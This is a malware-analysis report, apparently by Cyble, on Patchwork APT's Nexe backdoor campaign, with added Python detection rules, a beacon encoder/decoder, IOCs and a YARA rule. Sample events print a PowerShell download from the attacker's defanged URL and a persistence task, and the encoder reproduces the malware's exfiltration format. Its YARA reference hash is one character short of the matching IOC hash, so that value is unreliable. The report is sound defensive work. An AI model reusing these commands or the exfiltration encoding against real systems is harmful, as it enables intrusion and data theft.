Key takeaways
- Cyble Research and Intelligence Labs (CRIL) recently encountered an ongoing campaign related to the Patchwork APT group, which is likely aimed at Chinese entities.
- This campaign continues the trend of the Patchwork APT group, which has previously targeted entities in China and Bhutan.
- The threat actors (TAs) have used a malicious LNK file, likely originating from a phishing email, as the initial infection vector. This file executes a PowerShell script that downloads two files: a seemingly innocuous PDF intended to lure the user and a malicious Dynamic Link Library (DLL).
- This campaign employs DLL sideloading techniques to execute the downloaded DLL using the legitimate system file “WerFaultSecure.exe,” thereby obscuring the malicious activity.
- The loaded DLL decrypts and executes shellcode that patches the AmsiScanBuffer and EtwEventWrite APIs. This manipulation aims to evade detection mechanisms, allowing the malware to operate stealthily within the compromised system.
- The shellcode is then used to decrypt and execute the final payload, which steals sensitive information from the victim’s machine.
Overview
Patchwork, also known as Dropping Elephant, is a highly active advanced persistent threat (APT) group that has been engaged in cyber espionage operations since 2009. Believed to be based in India, this group primarily targets high-profile organizations such as government, defense, and diplomatic entities across South and Southeast Asia.
Cyble Research and Intelligence Labs (CRIL) has been closely monitoring the activities of the Patchwork APT group since July 2024. On July 24, 2024, CRIL observed a campaign related to Patchwork APT. By pivoting through the sample’s data, CRIL observed several files associated with two major Patchwork APT campaigns: the first targeting Bhutan and the second targeting Chinese entities.
Campaign Targeting China
This campaign involves a malicious LNK file titled “COMAC_Technology_Innovation.pdf.lnk,” which references the Commercial Aircraft Corporation of China and specifically targets Chinese entities. This lure capitalizes on the seventh COMAC International Science and Technology Innovation Week, with TAs leveraging this event to focus on organizations in the aerospace, technology research, and government sectors, thereby increasing the success rate of their phishing campaign. Researchers from Aliyun have analyzed this campaign and published their findings in a blog post detailing the tactics used by Patchwork.
Campaign Targeting Bhutan
Another notable campaign by this group, observed in the same month, targeted Bhutan with a file named ‘Large_Innovation_Project_for_Bhutan.pdf.lnk.’ This decoy document contains a project proposal for Bhutan from the Adaptation Fund Board.
Ongoing Campaign
Among these, a newly identified LNK file, “186523-pdf.lnk”, appears to be linked to an ongoing campaign of the Patchwork group. This same sample was also shared by researcher Ginkgo and StrikeReady Labs on X (formerly Twitter).
When the malicious LNK file is executed, it downloads two components: a lure PDF and a malicious DLL containing encrypted shellcode. Additionally, it copies a system file from the victim’s machine, which is then leveraged to sideload the malicious DLL. This DLL then decrypts and executes the final payload directly in memory. The malware collects system information, such as the Process ID, public and private IP addresses, usernames, and more. It then transmits this data to the command and control (C&C) server, enabling further malicious actions, as shown in the image below.
This variant appears to be new compared to the payloads observed in earlier campaigns. For tracking purposes, we are naming the malware “Nexe” Backdoor, as the string “Nexe” was found hardcoded in the binary used for C&C communication.
Notably, this campaign lacks specific targets, as the lure consists of a plain, empty PDF. However, the names of the payload servers used in this campaign, such as shianchi[.]scapematic[.]info and jihang[.]scapematic[.]info, suggest that Chinese entities are likely being targeted. Typically, the Patchwork group’s payload server names are associated with the country they are focusing on.
Technical Details
The LNK file, disguised as a PDF, contains a PowerShell script that carries out several malicious actions. The image below shows its contents.
The script first uses an “Invoke-WebRequest” command to download a file from the URL “hxxps://jihang[.]scapematic[.]info/eqhgrh/uybvjxosg” and saves it as a PDF in the “C:\ProgramData” directory. This PDF file appears to be the lure document, but in this case it contains no content and is simply a plain, empty PDF.
Next, the script downloads another file from a different URL on the same domain, “hxxps://shianchi[.]scapematic[.]info/jhgfd/jkhxvcf,” saving it initially as “hal” in the “C:\ProgramData” directory. It then renames the file to “wer.dll” in the same location.
The script proceeds to copy the Windows system file “WerFaultSecure.exe” from “C:\Windows\System32” to “C:\ProgramData”, most likely to facilitate DLL sideloading. The image below shows the downloaded files on the victim’s machine.
Finally, it creates a scheduled task named “EdgeUpdate” to run “WerFaultSecure.exe” at regular intervals, ensuring persistence on the compromised system. The image below shows the scheduled task created on the system.
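The download, rename, copy and scheduled-task steps above leave a recognisable trail in process-creation telemetry. The following Python is an added example, not Cyble’s code and not the campaign’s script: it runs three detection rules over constructed records shaped like a simplified Sysmon process-creation export and flags WerFaultSecure.exe executing from anywhere other than System32 (the check behind the recommendation to restrict it to its designated location), a scheduled task whose action points at such a copy, and PowerShell downloading into C:\ProgramData. The record layout, the field names and the sample command lines are assumptions made for the example.

```python
"""Added example (not Cyble's code): detection rules for the LNK-stage
behaviour described in the report, run over constructed sample events."""
import re
from pathlib import PureWindowsPath

# The only directory WerFaultSecure.exe should legitimately run from.
LEGIT_DIR = PureWindowsPath(r"C:\Windows\System32")

# Constructed sample events shaped like a simplified Sysmon Event ID 1 export.
# Paths, PIDs and the task interval are invented for the example.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WerFaultSecure.exe",           # benign
     "cmdline": r"C:\Windows\System32\WerFaultSecure.exe /h /pid 4120",
     "parent": r"C:\Windows\System32\svchost.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden Invoke-WebRequest hxxps://jihang[.]scapematic[.]info/eqhgrh/uybvjxosg -OutFile C:\ProgramData\186523.pdf",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn EdgeUpdate /tr "C:\ProgramData\WerFaultSecure.exe" /sc minute /mo 5',
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"image": r"C:\ProgramData\WerFaultSecure.exe",                # sideload host
     "cmdline": r"C:\ProgramData\WerFaultSecure.exe",
     "parent": r"C:\Windows\System32\svchost.exe"},
]


def image_outside_system32(path: str, binary: str) -> bool:
    """True when `path` names `binary` but its directory is not System32.
    PureWindowsPath compares case-insensitively, matching NTFS semantics."""
    p = PureWindowsPath(path)
    return p.name.lower() == binary.lower() and p.parent != LEGIT_DIR


def scheduled_task_action(cmdline: str) -> str:
    """Extract the /tr (task run) argument from a schtasks command line."""
    m = re.search(r'/tr\s+(?:"([^"]+)"|(\S+))', cmdline, re.IGNORECASE)
    return (m.group(1) or m.group(2)) if m else ""


def scan_event(ev: dict) -> list:
    """Return the names of every rule the event matches."""
    hits = []
    image = PureWindowsPath(ev["image"])
    cmd = ev["cmdline"]
    low = cmd.lower()

    # Rule 1: WerFaultSecure.exe started from a non-System32 copy.
    if image_outside_system32(ev["image"], "WerFaultSecure.exe"):
        hits.append("werfaultsecure_outside_system32")

    # Rule 2: a scheduled task created to run such a copy (persistence step).
    if image.name.lower() == "schtasks.exe" and "/create" in low:
        action = scheduled_task_action(cmd)
        if image_outside_system32(action, "WerFaultSecure.exe"):
            hits.append("task_runs_werfaultsecure_outside_system32")

    # Rule 3: PowerShell pulling a file straight into C:\ProgramData.
    if image.name.lower() == "powershell.exe":
        if ("invoke-webrequest" in low or "downloadfile" in low) and "programdata" in low:
            hits.append("powershell_download_to_programdata")
    return hits


def scan_events(events: list) -> list:
    """Flatten (rule, image) pairs across all events for reporting."""
    return [(rule, ev["image"]) for ev in events for rule in scan_event(ev)]


if __name__ == "__main__":
    for rule, image in scan_events(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

The benign first record (the real WerFaultSecure.exe in System32) produces no hit, which is the point of keying the rule on the directory rather than on the file name alone. In a real deployment the task-action parsing would also need to cover tasks registered via Register-ScheduledTask or written directly under the Tasks folder, which the sample does not model.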
DLL Sideloading
Threat actors leveraged the DLL sideloading technique to load the malicious DLL file using the legitimate WerFaultSecure.exe, as shown in the image below.
After the DLL is successfully loaded, it decrypts the encrypted shellcode within it and writes the decrypted content into the memory of the WerFaultSecure process, as shown in the image below.
Bypassing Security Mechanisms via Memory Patching
The injected shellcode is crafted to bypass AMSI and Microsoft’s event tracing by patching specific bytes in the EtwEventWrite, AmsiScanString, and AmsiScanBuffer APIs, as shown in the images below.
Once the shellcode overwrites these APIs, it creates a section object from the previously decrypted content and maps it into the address space of WerFaultSecure. This allows the final VC++ compiled payload to execute without triggering any security alerts.
Final Payload
Once the payload is successfully loaded into memory, it uses the LoadLibraryW() API to load the modules required for execution, as shown in the image below.
After loading the required modules, the malware creates a mutex named “dsds” to ensure that only one instance of the malware runs on the victim’s system at a time, as shown in the figure below.
After creating the mutex, the malware retrieves a handle to the console window associated with the calling process. It then hides the console window and continues running in the background.
The malware then uses the GetAdaptersInfo() and GetHostName() functions to collect information about the network adapters and the device name on the compromised machine, as shown in the image below.
The malware queries https://myexternalip.com/raw using a specific user agent to obtain the victim’s public IP address, as demonstrated in the image below.
After gathering key system details, including the MAC address, username, and IP address, the malware computes the SHA256 hash of these values before further encryption, as shown in the image below.
After generating the hash, the malware encodes it in Base64 format. The resulting data then enters another encryption loop using the Salsa20 algorithm, which represents a change from the encryption method used in prior campaigns. This is followed by an additional round of Base64 encoding. The figure below shows the encryption code with key and nonce.
In addition to the previously mentioned details (the MAC address, username, and IP address), the malware also retrieves and encrypts the following information using the same sequence: it first converts the data into Base64 format, then applies the Salsa20 encryption algorithm, and finally encodes it again in Base64:
- Process ID
- Local IP address
- Windows version
- Username
- Hardcoded user-agent string
Each piece of encrypted system information is concatenated and separated by the “$” symbol. The image below displays the encrypted system information.
The encrypted data corresponds to the following fields:
- MAC address $ username $ public IP address $ private IP address $ Windows version $ username $ Process ID $ Nexe (hardcoded string) $ User-agent string
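To make the beacon layout concrete, the following Python is an added example, not the malware’s code and not Cyble’s: it reproduces the encoding chain the text describes (SHA256 for the MAC address, username and public IP; then Base64, Salsa20, Base64 for every field; fields joined with “$”) using a pure-Python Salsa20, and provides the matching decoder an analyst would use on a captured beacon once the key and nonce have been recovered from a sample. The 32-byte key, the 8-byte nonce, the hex form of the SHA256 digest and the sample field values are placeholders and assumptions; the real key and nonce are in the figure the report references and are not reproduced here.

```python
"""Added example (not the malware's or Cyble's code): Nexe-style beacon
encoder and decoder following the field order given in the report."""
import base64
import hashlib
import struct

# Placeholders: the real key/nonce live in the sample, not on this page.
PLACEHOLDER_KEY = bytes(range(32))
PLACEHOLDER_NONCE = b"\x00" * 8

# Constructed sample values in the report's order: (value, hash_with_sha256).
SAMPLE_FIELDS = [
    ("00-11-22-33-44-55", True),         # MAC address (hashed first)
    ("alice", True),                     # username (hashed first)
    ("203.0.113.7", True),               # public IP (hashed first)
    ("192.168.1.20", False),             # private IP
    ("Windows 10.0.19045", False),       # Windows version
    ("alice", False),                    # username again, not hashed
    ("4120", False),                     # process ID
    ("Nexe", False),                     # hardcoded marker string
    ("Mozilla/5.0 (constructed UA)", False),
]

MASK = 0xFFFFFFFF


def _rotl(v, c):
    return ((v << c) & MASK) | (v >> (32 - c))


def _quarterround(y0, y1, y2, y3):
    y1 ^= _rotl((y0 + y3) & MASK, 7)
    y2 ^= _rotl((y1 + y0) & MASK, 9)
    y3 ^= _rotl((y2 + y1) & MASK, 13)
    y0 ^= _rotl((y3 + y2) & MASK, 18)
    return y0, y1, y2, y3


def _salsa20_block(key, nonce, counter):
    """One 64-byte Salsa20/20 keystream block (32-byte key, 8-byte nonce)."""
    k = struct.unpack("<8I", key)
    n = struct.unpack("<2I", nonce)
    s = [0x61707865, k[0], k[1], k[2], k[3], 0x3320646E, n[0], n[1],
         counter & MASK, (counter >> 32) & MASK,
         0x79622D32, k[4], k[5], k[6], k[7], 0x6B206574]
    x = s[:]
    for _ in range(10):                      # 10 double rounds = 20 rounds
        x[0], x[4], x[8], x[12] = _quarterround(x[0], x[4], x[8], x[12])
        x[5], x[9], x[13], x[1] = _quarterround(x[5], x[9], x[13], x[1])
        x[10], x[14], x[2], x[6] = _quarterround(x[10], x[14], x[2], x[6])
        x[15], x[3], x[7], x[11] = _quarterround(x[15], x[3], x[7], x[11])
        x[0], x[1], x[2], x[3] = _quarterround(x[0], x[1], x[2], x[3])
        x[5], x[6], x[7], x[4] = _quarterround(x[5], x[6], x[7], x[4])
        x[10], x[11], x[8], x[9] = _quarterround(x[10], x[11], x[8], x[9])
        x[15], x[12], x[13], x[14] = _quarterround(x[15], x[12], x[13], x[14])
    return struct.pack("<16I", *[(a + b) & MASK for a, b in zip(x, s)])


def salsa20_xor(key, nonce, data):
    """Stream-cipher XOR; the same call encrypts and decrypts."""
    out = bytearray()
    for i in range(0, len(data), 64):
        ks = _salsa20_block(key, nonce, i // 64)
        out.extend(a ^ b for a, b in zip(data[i:i + 64], ks))
    return bytes(out)


def encode_field(value, key, nonce, hashed=False):
    """(optional SHA256) -> Base64 -> Salsa20 -> Base64, as the report describes."""
    data = value.encode()
    if hashed:                                # assumption: hex digest is what gets encoded
        data = hashlib.sha256(data).hexdigest().encode()
    inner = base64.b64encode(data)
    return base64.b64encode(salsa20_xor(key, nonce, inner)).decode()


def build_beacon(fields, key, nonce):
    return "$".join(encode_field(v, key, nonce, h) for v, h in fields)


def decode_field(token, key, nonce):
    """Reverse the chain for one '$'-separated token."""
    return base64.b64decode(salsa20_xor(key, nonce, base64.b64decode(token)))


def parse_beacon(beacon, key, nonce):
    """Analyst-side decoder: split on '$' and reverse each field."""
    return [decode_field(t, key, nonce) for t in beacon.split("$")]


if __name__ == "__main__":
    beacon = build_beacon(SAMPLE_FIELDS, PLACEHOLDER_KEY, PLACEHOLDER_NONCE)
    print(beacon)
    for part in parse_beacon(beacon, PLACEHOLDER_KEY, PLACEHOLDER_NONCE):
        print(part)
```

Because Salsa20 is a stream cipher, every field is XORed against the same keystream when key and nonce are fixed, so the decoder needs nothing beyond those two values; that also means the first three decoded fields come back as SHA256 digests rather than the raw MAC, username and IP, which is why a beacon captured on the wire cannot be tied back to a host without an independent list of candidate values to hash.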
Using the final generated string, the malware initiates an HTTP request to a hardcoded domain, “iceandfire[.]xyz,” which is embedded in the code, as illustrated in the image below.
After constructing the HTTP request, the malware transmits the encrypted data to its C&C server. However, since the C&C was not active during the analysis, we could not fully assess its behavior. Nevertheless, following the POST request, the malware creates two threads capable of performing various tasks, as shown in the image below.
The thread extracts partial content from the initially generated string, which includes the encrypted MAC address, username, and public IP address of the victim’s machine, and attempts to send this data to the same domain.
The threads read the server’s response following the request and then compare the response with the following values:
- upload
- uplexe
- download
- filelist
- screenshot
This comparison lets the thread determine the actions or commands that it should execute on the system.
Conclusion
The continued evolution and enhancement of the Patchwork APT group’s malware capabilities highlight their commitment to remaining at the forefront of espionage and cyber operations. The latest attack exemplifies their ability to evade security alerts and execute malicious files directly in memory, showcasing a sophisticated approach that underscores their adaptability and resourcefulness in the ever-changing landscape of cybersecurity threats. This adaptability not only enables them to bypass traditional defenses but also poses significant challenges for organizations seeking to protect themselves from such advanced tactics.
Recommendations
- The initial breach may occur via spam emails. Therefore, it is advisable to deploy robust email filtering systems to identify and prevent the dissemination of harmful attachments.
- When handling email attachments or links, particularly those from unknown senders, exercising caution is crucial. Verify the sender’s identity, particularly if an email seems suspicious.
- Consider disabling or limiting the execution of scripting languages on user workstations and servers if they are not essential for legitimate purposes.
- Restrict the execution of WerFaultSecure.exe to its designated location to prevent unauthorized execution from other directories.
- Use a reputed anti-virus and internet security software package on your connected devices, including PC, laptop, and mobile.
- Monitor the beacon at the network level to block data exfiltration by malware or TAs.
MITRE ATT&CK® Techniques
| Tactic | Technique ID | Technique Name |
| --- | --- | --- |
| Initial Access (TA0027) | Phishing (T1660) | Malware distribution via phishing site |
| Execution (TA0002) | User Execution (T1204) | Manual execution by the user |
| Defense Evasion (TA0005) | Masquerading (T1036.008) | LNK file disguised as a legitimate PDF file |
| Privilege Escalation (TA0004) | DLL Side-Loading (T1574.002) | Adversaries may execute their own malicious payloads by side-loading DLLs. |
| Privilege Escalation (TA0004) | Process Injection (T1055) | Injects malicious code into werfaultsecure.exe |
| Discovery (TA0007) | System Information Discovery (T1082) | Queries the system information |
| C&C (TA0011) | Application Layer Protocol (T1071) | Malware exe communicates with the C&C server. |
| Exfiltration (TA0010) | Exfiltration Over C2 Channel (T1041) | Exfiltration Over C2 Channel |
Indicators of Compromise (IOCs)
| Indicators | Indicator Type | Description |
| --- | --- | --- |
| d7b278d20f47203da07c33f646844e74cb690ed802f2ba27a74e216368df7db9 | SHA256 | Malicious LNK file |
| ba262c587f1f5df7c2ab763434ef80785c5b51cac861774bf66d579368b56e31 | SHA256 | Malicious DLL file |
| fe503708d7969e65e9437b56b6559bc9b6bb7f46f3be5022db9406579592670d | SHA256 | Decoy PDF |
| f6d171e79e2fb38b3919011835c8117a1c56788bcf634e69ae67a5e255fb9d58 | SHA256 | LNK used to target Bhutan |
| 14bbe421abe496531f4c63b16881eee23fb2c92b2938335dca1668206882201a | SHA256 | LNK used to target Bhutan |
| c3805b8b37eb1ba34057cd6c882dc9bedcebc01ec90a6d4be8d0f6fc82859ecb | SHA256 | LNK used to target Bhutan |
| c6398b5ca98e0da75c7d1ec937507640037ce3f3c66e074c50a680395ecf5eae | SHA256 | LNK targeting Chinese entities |
| hxxps://shianchi[.]scapematic[.]info/jhgfd/jkhxvcf | URL | Remote server |
| hxxps://jihang[.]scapematic[.]info/eqhgrh/uybvjxosg | URL | Remote server |
| iceandfire[.]xyz | Domain | C&C Server |
Yara Rule
```yara
rule Nexe_Backdoor
{
    meta:
        author = "Cyble Research and Intelligence Labs"
        description = "Detects malicious backdoor used in the latest Patchwork APT campaign"
        date = "2024-09-26"
        os = "Windows"
        reference_sample = "ba262c587f1f5df7c2ab763434ef80785c5b51cac861774bf66d579368b56e3"
    strings:
        $a = "WerSysprepCleanup"
        $b = "WerpSetReportFlags"
        $c = "WriteProcessMemory"
        $d = "VirtualAllocEx"
        $e = "LaunchAESC.pdb"
    condition:
        uint16(0) == 0x5A4D and all of them
}
```